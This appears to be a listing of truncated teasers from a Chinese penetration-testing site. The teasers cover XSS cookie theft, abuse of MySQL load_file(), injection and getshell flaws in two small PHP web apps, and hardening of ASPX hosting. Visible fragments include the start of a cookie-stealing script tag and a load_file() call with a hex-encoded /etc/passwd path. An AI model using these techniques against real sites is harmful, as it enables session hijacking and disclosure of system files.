-
利用XSS转存Cookie
利用XSS转存cookie:插入XSS语句<script>document.write('<img src="" width=0 height=0 border=0 />');</scrip...
-
基于PHP+MySQL渗透测试中load_file()函数淫荡用法
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)2、replace(load_file(char(47,101,116,99,47,112...
-
歪酷CMS v1.0 注入漏洞
看代码…省略若干代码………public function index() { //读取数据库&判断 $type = M...
-
狂盗小说小偷getshell漏洞
必须开启缓存才能利用先看代码book.php$kd_cachedir = "./cache"; if($kd_book_cache=="ture"){//缓存必须开启 $lastflesh = @...
-
ASPX服务一些安全设置
1、aspx 木马文件可以在asp.net空间中实现读取进程、iis信息、跨站、执行cmd命令。 解决方法 1、对于每个网站建立一个用户、并将用户放入guest组,给站点写入、读取的权限。并在iis上允许匿名访问。 2、<system...
